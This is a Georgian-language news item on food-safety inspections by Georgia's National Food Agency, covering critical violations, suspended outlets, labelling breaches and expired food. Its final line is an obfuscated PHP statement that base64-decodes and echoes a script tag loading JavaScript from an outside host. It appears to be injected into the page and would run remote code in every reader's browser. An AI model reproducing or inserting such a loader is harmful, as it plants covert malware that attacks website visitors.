celsiusi
ავერსი საქკაბელი

2024 წლის სამ თვეში, სურსათის ეროვნული სააგენტოს მიერ საერთო ჯამში 600-ზე მეტი კვების ობიექტია შემოწმებული, საიდანაც 24 ობიექტში კრიტიკული შეუსაბამობა დაფიქსირდა. ამის შესახებ ინფორმაციას სურსათის ეროვნული სააგენტო ავრცელებს.

მათი ინფორმაციით, სურსათის ეროვნული სააგენტო საზოგადოებრივი კვების ობიექტების კონტროლს ააქტიურებს. შემოწმებისას განსაკუთრებული ყურადღება ექცევა სურსათის ეტიკეტირებას, მიკვლევადობას, სანიტარიულ-ჰიგიენურ ნორმებს, საფრთხის ანალიზისა და კრიტიკული საკონტროლო წერტილების (HACCP) სისტემის გამართულ ფუნქციონირებას.

"სურსათის ეროვნული სააგენტოს თბილისის საქალაქო სამსახური საზოგადოებრივი კვების ობიექტების შემოწმებას ახორციელებს. დღეის მონაცემებით, 2024 წლის წლიური პროგრამის ფარგლებში, თბილისში 200-მდე სახელმწიფო კონტროლია განხორციელებული, აქედან 24-ში დაფიქსირდა კრიტიკული შეუსაბამობა, რის გამოც სააგენტომ ბიზნეს ოპერატორებს საქმიანობა შეუჩერა კრიტიკული შეუსაბამობის აღმოფხვრამდე.

რაც შეეხება სხვა დარღვევებს, რომელიც საზოგადოებრივი კვების ობიექტებში, ეს არის ეტიკეტირების წესის დარღვევა, მიკვლევადობის მოთხოვნების შეუსრულებლობის ფაქტი, ასევე ვადაგასული სურსათის რეალიზაციის ფაქტების დაფიქსირება", - აცხადებს თბილისის საქალაქო სამსახურის ინსპექტორი, ალექსანდრე თათარიშვილი.

გარდა ამისა, დოკუმენტური შემოწმების შედეგად დაფიქსირდა ეტიკეტირების წესის დარღვევის შემთხვევები, ვადაგასული სურსათი. ბიზნესოპერატორებს დაევალათ შესაბამისი ღონისძიებების გატარება, რომლის შესრულება და სურსათის განადგურებაზე ზედამხედველობა სააგენტოს ინსპექტორებმა განახორციელეს.

აღსანიშნავია, რომ სურსათის ეროვნული სააგენტო უწყვეტად ახორციელებს საკვების ობიექტების კონტროლს მთელი საქართველოს მასშტაბით, მათ შორის, ტურისტებით დატვირთულ რეგიონებში. შედეგების შესახებ საზოგადოება რეგულარულად არის ინფორმირებული.

177
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");